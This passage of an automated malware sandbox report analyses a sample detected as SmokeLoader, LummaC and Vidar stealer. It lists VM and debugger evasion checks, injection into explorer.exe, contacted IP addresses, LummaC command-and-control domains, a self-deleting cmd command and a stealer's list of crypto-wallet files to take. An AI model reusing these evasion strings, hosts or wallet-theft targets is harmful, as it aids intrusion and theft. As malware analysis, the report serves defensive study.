                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                barindex
                Yara detected AntiVM3
                Source: Yara matchFile source: Process Memory Space: kat796E.tmp PID: 6620, type: MEMORYSTR
                Checks if the current machine is a virtual machine (disk enumeration)
                Source: C:\Users\user\Desktop\4.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\Desktop\4.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\Desktop\4.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\Desktop\4.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\Desktop\4.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\Desktop\4.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\sdveeeuKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\sdveeeuKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\sdveeeuKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\sdveeeuKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\sdveeeuKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\sdveeeuKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Query firmware table information (likely to detect VMs)
                Source: C:\Users\user\AppData\Local\Temp\F441.exeSystem information queried: FirmwareTableInformationJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                Source: kat796E.tmp, 00000009.00000002.2823531512.0000000000422000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: AHAL9THJOHNDOEAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL
                Source: sdveeeu, 00000005.00000002.1997292186.0000000002FFE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOKG
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 6_2_00503F97 rdtsc 6_2_00503F97
                Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 363Jump to behavior
                Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 1746Jump to behavior
                Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 719Jump to behavior
                Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 3159Jump to behavior
                Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 888Jump to behavior
                Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 856Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpDropped PE file which has not been started: C:\ProgramData\HJJJECFIECBG\nss3.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpDropped PE file which has not been started: C:\ProgramData\HJJJECFIECBG\freebl3.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqls[1].dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpDropped PE file which has not been started: C:\ProgramData\HJJJECFIECBG\softokn3.dllJump to dropped file
                Source: C:\Windows\explorer.exe TID: 6344Thread sleep count: 363 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 5460Thread sleep count: 1746 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 5460Thread sleep time: -174600s >= -30000sJump to behavior
                Source: C:\Windows\explorer.exe TID: 6364Thread sleep count: 719 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 6364Thread sleep time: -71900s >= -30000sJump to behavior
                Source: C:\Windows\explorer.exe TID: 3220Thread sleep count: 259 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 2872Thread sleep count: 295 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 3736Thread sleep count: 327 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 3736Thread sleep time: -32700s >= -30000sJump to behavior
                Source: C:\Windows\explorer.exe TID: 5460Thread sleep count: 3159 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 5460Thread sleep time: -315900s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exe TID: 5496Thread sleep time: -210000s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exe TID: 3328Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\timeout.exe TID: 3900Thread sleep count: 59 > 30
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6CFAEBF0 PR_GetNumberOfProcessors,GetSystemInfo,9_2_6CFAEBF0
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                Source: explorer.exe, 00000001.00000000.1695468211.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                Source: explorer.exe, 00000001.00000000.1694837986.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
                Source: explorer.exe, 00000001.00000000.1694837986.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NECVMWar VMware SATA CD00\w
                Source: explorer.exe, 00000001.00000000.1695468211.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                Source: explorer.exe, 00000001.00000000.1691436456.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
                Source: kat796E.tmp, 00000009.00000002.2829304826.0000000005170000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMwareyst^
                Source: explorer.exe, 00000001.00000000.1695468211.0000000009977000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
                Source: kat796E.tmp, 00000009.00000002.2826699308.000000000080E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWHA
                Source: explorer.exe, 00000001.00000000.1692944152.00000000078AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTTAVMWare
                Source: explorer.exe, 00000001.00000000.1694837986.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
                Source: explorer.exe, 00000001.00000000.1694837986.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1694837986.000000000982D000.00000004.00000001.00020000.00000000.sdmp, F441.exe, 00000006.00000002.2557803498.000000000052A000.00000004.00000020.00020000.00000000.sdmp, F441.exe, 00000006.00000002.2557803498.000000000055A000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2826699308.0000000000884000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2410519110.000000000086F000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2826699308.0000000000894000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2410519110.000000000088B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: F441.exe, 00000006.00000002.2557803498.000000000055A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW&
                Source: kat796E.tmp, 00000009.00000002.2829304826.0000000005170000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: explorer.exe, 00000001.00000000.1695468211.0000000009977000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
                Source: explorer.exe, 00000001.00000000.1692944152.0000000007A34000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBnx
                Source: explorer.exe, 00000001.00000000.1694837986.0000000009660000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
                Source: explorer.exe, 00000001.00000000.1691436456.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
                Source: explorer.exe, 00000001.00000000.1691436456.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: C:\Users\user\Desktop\4.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\4.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
                Source: C:\Users\user\Desktop\4.exeSystem information queried: CodeIntegrityInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\sdveeeuSystem information queried: CodeIntegrityInformationJump to behavior
                Source: C:\Users\user\Desktop\4.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\AppData\Roaming\sdveeeuProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 6_2_00503F97 rdtsc 6_2_00503F97
                Source: C:\Users\user\Desktop\4.exeCode function: 0_2_00402A9F LdrLoadDll,0_2_00402A9F
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6D07AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_6D07AC62
                Source: C:\Users\user\Desktop\4.exeCode function: 0_2_02DD0D90 mov eax, dword ptr fs:[00000030h]0_2_02DD0D90
                Source: C:\Users\user\Desktop\4.exeCode function: 0_2_02DD092B mov eax, dword ptr fs:[00000030h]0_2_02DD092B
                Source: C:\Users\user\Desktop\4.exeCode function: 0_2_02EF19AA push dword ptr fs:[00000030h]0_2_02EF19AA
                Source: C:\Users\user\AppData\Roaming\sdveeeuCode function: 5_2_02E10D90 mov eax, dword ptr fs:[00000030h]5_2_02E10D90
                Source: C:\Users\user\AppData\Roaming\sdveeeuCode function: 5_2_02E1092B mov eax, dword ptr fs:[00000030h]5_2_02E1092B
                Source: C:\Users\user\AppData\Roaming\sdveeeuCode function: 5_2_030113E2 push dword ptr fs:[00000030h]5_2_030113E2
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 6_2_004FED1B push dword ptr fs:[00000030h]6_2_004FED1B
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 6_2_020F092B mov eax, dword ptr fs:[00000030h]6_2_020F092B
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 6_2_020F0D90 mov eax, dword ptr fs:[00000030h]6_2_020F0D90
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6D07AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_6D07AC62

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Benign windows process drops PE files
                Source: C:\Windows\explorer.exeFile created: 9EDA.exe.1.drJump to dropped file
                System process connects to network (likely due to code injection or exploit)
                Source: C:\Windows\explorer.exeNetwork Connect: 91.202.233.231 80Jump to behavior
                Source: C:\Windows\explorer.exeNetwork Connect: 190.28.110.209 80Jump to behavior
                Source: C:\Windows\explorer.exeNetwork Connect: 23.145.40.124 80Jump to behavior
                Source: C:\Windows\explorer.exeNetwork Connect: 185.18.245.58 80Jump to behavior
                Source: C:\Windows\explorer.exeNetwork Connect: 45.129.96.86 80Jump to behavior
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: 9EDA.exe PID: 2124, type: MEMORYSTR
                Allocates memory in foreign processes
                Source: C:\Users\user\AppData\Local\Temp\9EDA.exeMemory allocated: C:\Users\user\AppData\Local\Temp\kat796E.tmp base: 400000 protect: page execute and read and writeJump to behavior
                Contains functionality to inject code into remote processes
                Source: C:\Users\user\AppData\Local\Temp\9EDA.exeCode function: 8_2_0429A4F0 NtAllocateVirtualMemory,GetTempFileNameA,CreateFileA,WriteFile,CreateProcessA,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,Wow64GetThreadContext,Wow64SetThreadContext,ResumeThread,ExitProcess,8_2_0429A4F0
                Creates a thread in another existing process (thread injection)
                Source: C:\Users\user\Desktop\4.exeThread created: C:\Windows\explorer.exe EIP: 87C19E0Jump to behavior
                Source: C:\Users\user\AppData\Roaming\sdveeeuThread created: unknown EIP: 34119E0Jump to behavior
                Injects a PE file into a foreign processes
                Source: C:\Users\user\AppData\Local\Temp\9EDA.exeMemory written: C:\Users\user\AppData\Local\Temp\kat796E.tmp base: 400000 value starts with: 4D5AJump to behavior
                LummaC encrypted strings found
                Source: F441.exeString found in binary or memory: zippyfinickysofwps.shop
                Source: F441.exeString found in binary or memory: obsceneclassyjuwks.shop
                Source: F441.exeString found in binary or memory: acceptabledcooeprs.shop
                Source: F441.exeString found in binary or memory: whispedwoodmoodsksl.shop
                Source: F441.exeString found in binary or memory: boredimperissvieos.shop
                Source: F441.exeString found in binary or memory: holicisticscrarws.shop
                Source: F441.exeString found in binary or memory: sweetsquarediaslw.shop
                Source: F441.exeString found in binary or memory: plaintediousidowsko.shop
                Source: F441.exeString found in binary or memory: miniaturefinerninewjs.shop
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\4.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
                Source: C:\Users\user\Desktop\4.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
                Source: C:\Users\user\AppData\Roaming\sdveeeuSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
                Source: C:\Users\user\AppData\Roaming\sdveeeuSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
                Sample uses process hollowing technique
                Source: C:\Users\user\AppData\Local\Temp\9EDA.exeSection unmapped: C:\Users\user\AppData\Local\Temp\kat796E.tmp base address: 400000Jump to behavior
                Writes to foreign memory regions
                Source: C:\Users\user\AppData\Local\Temp\9EDA.exeMemory written: C:\Users\user\AppData\Local\Temp\kat796E.tmp base: 400000Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\9EDA.exeMemory written: C:\Users\user\AppData\Local\Temp\kat796E.tmp base: 401000Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\9EDA.exeMemory written: C:\Users\user\AppData\Local\Temp\kat796E.tmp base: 422000Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\9EDA.exeMemory written: C:\Users\user\AppData\Local\Temp\kat796E.tmp base: 42E000Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\9EDA.exeMemory written: C:\Users\user\AppData\Local\Temp\kat796E.tmp base: 641000Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\9EDA.exeProcess created: C:\Users\user\AppData\Local\Temp\kat796E.tmp C:\Users\user\AppData\Local\Temp\kat796E.tmpJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\kat796E.tmp" & rd /s /q "C:\ProgramData\HJJJECFIECBG" & exitJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6D0C4760 malloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,GetLengthSid,GetLengthSid,GetLengthSid,malloc,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,PR_SetError,GetLastError,free,GetLastError,GetLastError,free,free,free,9_2_6D0C4760
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6CFA1C30 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLengthSid,malloc,CopySid,CopySid,GetTokenInformation,GetLengthSid,malloc,CopySid,CloseHandle,AllocateAndInitializeSid,GetLastError,PR_LogPrint,9_2_6CFA1C30
                Source: explorer.exe, 00000001.00000000.1691692747.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1692760853.0000000004CE0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1694837986.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: explorer.exe, 00000001.00000000.1691692747.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: explorer.exe, 00000001.00000000.1691436456.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1Progman$
                Source: explorer.exe, 00000001.00000000.1691692747.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: explorer.exe, 00000001.00000000.1691692747.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6D07AE71 cpuid 9_2_6D07AE71
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6D07A8DC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,9_2_6D07A8DC
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6CFC8390 NSS_GetVersion,9_2_6CFC8390
                Source: C:\Users\user\AppData\Local\Temp\F441.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: F441.exe, 00000006.00000003.2416404602.0000000002C93000.00000004.00000800.00020000.00000000.sdmp, F441.exe, 00000006.00000002.2557803498.0000000000543000.00000004.00000020.00020000.00000000.sdmp, F441.exe, 00000006.00000003.2374105499.0000000002C8F000.00000004.00000800.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2826699308.0000000000867000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: C:\Users\user\AppData\Local\Temp\F441.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

                Stealing of Sensitive Information

                barindex
                Yara detected CryptOne packer
                Source: Yara matchFile source: 00000008.00000002.2367245852.0000000004299000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Yara detected LummaC Stealer
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Yara detected SmokeLoader
                Source: Yara matchFile source: 00000005.00000002.1997200798.0000000002E41000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1712388101.0000000002DE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.1997158048.0000000002E20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1712494428.0000000002E51000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Yara detected Vidar
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Yara detected Vidar stealer
                Source: Yara matchFile source: 8.2.9EDA.exe.44d0000.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.9EDA.exe.4490000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.9EDA.exe.4267719.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.9EDA.exe.4490000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.9EDA.exe.4267719.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.9EDA.exe.44d0000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000008.00000002.2367767500.00000000044D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2367654116.0000000004490000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2367245852.0000000004190000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: 9EDA.exe PID: 2124, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: kat796E.tmp PID: 6620, type: MEMORYSTR
                Found many strings related to Crypto-Wallets (likely being stolen)
                Source: F441.exe, 00000006.00000003.2351445526.0000000000573000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum
                Source: kat796E.tmp, 00000009.00000002.2826699308.0000000000933000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda 